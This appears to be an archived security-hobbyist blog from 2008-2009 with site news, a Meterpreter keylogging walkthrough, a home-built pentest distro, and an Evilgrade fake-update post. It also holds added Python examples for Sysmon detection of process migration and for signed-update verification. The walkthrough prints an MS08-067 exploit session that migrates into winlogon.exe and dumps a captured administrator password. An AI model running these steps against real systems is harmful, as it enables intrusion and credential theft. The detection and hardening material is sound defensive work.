
22 Apr 2009

New Features

By Spitfire. Posted in Site Stuff | 1 Comment »

As you may have noticed, we've added some new forum sections where you can post your own music and art. So check it out and post your beats and lyrics.



It’s been a while…

We decided to take an unexpected sabbatical from the site about 3 months ago, mostly due to other commitments like sports, school, and all that fun stuff. Despite all that, we're back with a bunch of new stuff. As you can see, we've updated the design of the site. The old theme was a bit outdated and had some CSS issues. The SMF forums also decided to commit hara-kiri by corrupting their own SQL data. I was too lazy to try and restore it… so give a big welcome to the new and improved Simple:Press forums! More features are soon to come.

Now, to start off the return of our site and hit the ground running, I thought I'd share something I found out about around 4 minutes ago. The MSF crew has added a new feature to the Meterpreter payload that sniffs keystrokes remotely. The only catch is that the keylogger can only capture keystrokes from processes that interact with the desktop. This is easily fixed by migrating into such a process, for example Explorer.exe or winlogon.exe. They give an example on their blog based off the MS08-067 exploit, but it can easily be reproduced without an exploit:

msf exploit(ms08_067_netapi) > exploit
[*] Triggering the vulnerability…
[*] Sending stage (2650 bytes)
[*] Uploading DLL (75787 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened

meterpreter > ps

Process list
============

PID Name Path
--- ---- ----
292 wscntfy.exe C:\WINDOWS\system32\wscntfy.exe
316 Explorer.EXE C:\WINDOWS\Explorer.EXE
356 smss.exe \SystemRoot\System32\smss.exe
416 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
440 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
[ snip ]

meterpreter > migrate 440
[*] Migrating to 440…
[*] Migration completed successfully.

meterpreter > keyscan_start
Starting the keystroke sniffer…
[ wait for user login ]

meterpreter > keyscan_dump
Dumping captured keystrokes…
Administrator <Tab> s3cretp4ss <Return>
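From the defender's side, the interesting moment in that session is not the keystroke dump but the migrate step: to read desktop keystrokes from winlogon.exe or Explorer.EXE, some other process first has to create a thread inside it, and Sysmon records exactly that pair as Event ID 8 (CreateRemoteThread) with a SourceImage and a TargetImage. The following is an added example, not code from this post or from Metasploit; it scans constructed log lines written in a simplified key=value form rather than Sysmon's real XML, and the allowlist of expected source images is an assumption to be tuned from a clean baseline.

```python
"""Added example (not from the post or from Metasploit): flag process
migration into desktop processes using Sysmon Event ID 8 records.

The log lines below are constructed for this example, in a simplified
key=value rendering rather than Sysmon's real XML.
"""
import re
from collections import namedtuple

Alert = namedtuple("Alert", "source target thread_id reason")

# Desktop-interacting processes the post names as migration targets.
SENSITIVE_TARGETS = {"winlogon.exe", "explorer.exe"}

# Images assumed to legitimately create threads in those targets on this
# host. This allowlist is an assumption; build it from a clean baseline.
ALLOWED_SOURCES = {"csrss.exe"}

LINE_RE = re.compile(
    r"EventID=(?P<eid>\d+)\s+SourceImage=(?P<src>\S+)\s+"
    r"TargetImage=(?P<dst>\S+)\s+NewThreadId=(?P<tid>\d+)"
)


def basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def scan(lines):
    """Return one Alert per remote thread created in a sensitive target
    by a source image that is not on the allowlist."""
    alerts = []
    for line in lines:
        m = LINE_RE.search(line)
        if not m or m.group("eid") != "8":
            continue  # not a CreateRemoteThread record
        src, dst = basename(m.group("src")), basename(m.group("dst"))
        if dst in SENSITIVE_TARGETS and src not in ALLOWED_SOURCES:
            alerts.append(Alert(src, dst, int(m.group("tid")),
                                "remote thread into %s from %s" % (dst, src)))
    return alerts


# Constructed sample: a process-create event (ignored), an expected csrss
# thread, a svchost.exe-to-winlogon.exe thread (the shape a migrate from a
# service-hosted payload leaves), and a thread into a non-target process.
SAMPLE_LOG = [
    r"EventID=1 Image=C:\WINDOWS\system32\cmd.exe ParentImage=C:\WINDOWS\Explorer.EXE",
    r"EventID=8 SourceImage=C:\WINDOWS\system32\csrss.exe TargetImage=C:\WINDOWS\Explorer.EXE NewThreadId=1204",
    r"EventID=8 SourceImage=C:\WINDOWS\system32\svchost.exe TargetImage=C:\WINDOWS\system32\winlogon.exe NewThreadId=1320",
    r"EventID=8 SourceImage=C:\WINDOWS\system32\svchost.exe TargetImage=C:\WINDOWS\system32\spoolsv.exe NewThreadId=1333",
]

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print("ALERT: %s (thread %d)" % (a.reason, a.thread_id))
```

Note that an allowlist keyed on image name alone is fragile: in the MS08-067 case above the stage runs inside the Server service's svchost.exe, so the source image is a legitimate system binary. Event ID 8 also carries StartAddress and StartModule, and a thread that starts at an address with no backing module is a stronger signal than the source name.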



If you haven't noticed already, we've been lacking new updates to the site. No, it's not because we're lazy (well, that may be part of it) but rather because we've been working on a little project :D. For the past 3 weeks Spitfire and I have been developing a Linux distribution that we've dubbed Chronix. Our ultimate goal with this distro is to provide people with an alternative to BackTrack, though right now it doesn't even come close to the pentesting liveCD we all love :).
The distro is an LFS (Linux From Scratch) build, meaning everything was compiled from scratch. I've added slapt-get, Slackware's package manager, to make installing packages easier. I've also added rpm, and plan to try to merge Portage with slapt-get, leaving a final Linux mutt of Slackware + Gentoo + Red Hat. To add to the mix, we might use LZMA (the file-system compression algorithm Slax uses) when creating the liveCD.

Some specs. Chronix has:

  • A 2.6.27 Linux kernel
  • slapt-get
  • RPM
  • KDE 3.5
  • XFCE 4.4.3
  • Xorg 7.2 (going to change this)
  • Various security packages
  • Perl, Python, Ruby, Java

The list is and will grow longer as time goes on, but we can't do this alone. After Spit and I find a storage solution, we will be uploading a liveCD and a VMware image of the distro, making the project open source. So stay tuned :D



5 Nov 2008

The Forums Are Actually Up!

By Copy. Posted in Site Stuff | No Comments »

So after a series of different experiments with WordPress-based forums, we decided to drop the whole idea altogether and set up an integrated BB-based forum. It took a little longer than expected, and after much frustration and several MySQL restores later, we finally boiled it down to the final (yet still dynamic) product. Just click on the Forums tab up at the top and post till your fingers bleed (figure of speech, don't really do that).

Quick note: you MUST be registered to view all of the boards and topics!



28 Sep 2008

Episode 1: Evilgrade

By Copy. Posted in Videos | 1 Comment »

Evilgrade is a new framework developed by Infobyte that takes advantage of the poorly implemented upgrade methods of different applications. The framework is built from modules; each module serves as the template needed to emulate a fake update for one application, allowing a fake update to be injected. However, Evilgrade only works if the attacker can already manipulate network traffic, e.g. via DNS cache poisoning or a MITM position. In this video we show you how to set up and run Evilgrade. The framework initially comes with 10 modules, but you can certainly write your own modules for different applications. Remember this is only version 1 and there may be bugs, so it's best not to try to use this offensively.
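The "poorly implemented upgrade method" the modules emulate is an updater that believes whatever the network hands it, which is why controlling DNS or sitting in the path is all it takes. The added example below, which is not part of Evilgrade or of any vendor's updater, puts that vulnerable pattern beside the check that closes it: the release is authenticated with a publisher key the client already holds, so a substituted manifest or package is refused no matter how it arrived. The signing key, manifest format, version numbers and payload bytes are all constructed for the example, and it needs the `cryptography` package for Ed25519.

```python
"""Added example (not part of Evilgrade or any vendor's updater): a naive
updater beside one that verifies the release before installing it.

Key, manifest format and payloads are constructed for this example.
"""
import hashlib
import json

from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

# Publisher's signing key, generated here so the example runs stand-alone.
# In practice only the public key ships inside the client.
_PUBLISHER_KEY = Ed25519PrivateKey.generate()
PUBLISHER_PUBKEY = _PUBLISHER_KEY.public_key()

CURRENT_VERSION = (1, 4, 0)  # constructed installed version


def build_release(version, package):
    """Publisher side: manifest (version + package hash) plus its signature."""
    manifest = json.dumps(
        {"version": list(version), "sha256": hashlib.sha256(package).hexdigest()},
        sort_keys=True,
    ).encode()
    return manifest, _PUBLISHER_KEY.sign(manifest), package


def naive_update(manifest, package):
    """Vulnerable pattern: install anything that claims to be newer."""
    info = json.loads(manifest)
    return tuple(info["version"]) > CURRENT_VERSION


def verified_update(manifest, signature, package, pubkey=PUBLISHER_PUBKEY):
    """Hardened pattern: signature, package hash and anti-rollback must all pass."""
    try:
        pubkey.verify(signature, manifest)  # raises on any change to the manifest
    except InvalidSignature:
        return False
    info = json.loads(manifest)
    if hashlib.sha256(package).hexdigest() != info["sha256"]:
        return False  # package on the wire does not match the signed manifest
    return tuple(info["version"]) > CURRENT_VERSION  # refuse downgrades


def simulate(scenario):
    """Feed both updaters one release under a scenario and return
    (naive_result, verified_result):
      'legit'        - nothing on the wire is touched
      'swap_package' - the package is replaced, the manifest left alone
      'swap_both'    - package replaced and a newer manifest forged
    """
    manifest, sig, pkg = build_release((1, 5, 0), b"constructed legit installer")
    if scenario == "swap_package":
        pkg = b"constructed injected payload"
    elif scenario == "swap_both":
        pkg = b"constructed injected payload"
        manifest = json.dumps(  # cannot be signed without the publisher's key
            {"version": [9, 9, 9], "sha256": hashlib.sha256(pkg).hexdigest()},
            sort_keys=True,
        ).encode()
    return naive_update(manifest, pkg), verified_update(manifest, sig, pkg)


if __name__ == "__main__":
    for s in ("legit", "swap_package", "swap_both"):
        print(s, simulate(s))
```

The naive updater accepts all three scenarios; the verified one accepts only the untouched release. TLS on the download channel would not substitute for this check: it authenticates a server, not the artifact, and a poisoned DNS answer pointing at a host with a valid certificate for some other name still defeats an updater that does not validate the name. The version comparison is there because an attacker who can replay an old, genuinely signed release is the other half of "poorly implemented upgrade methods".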
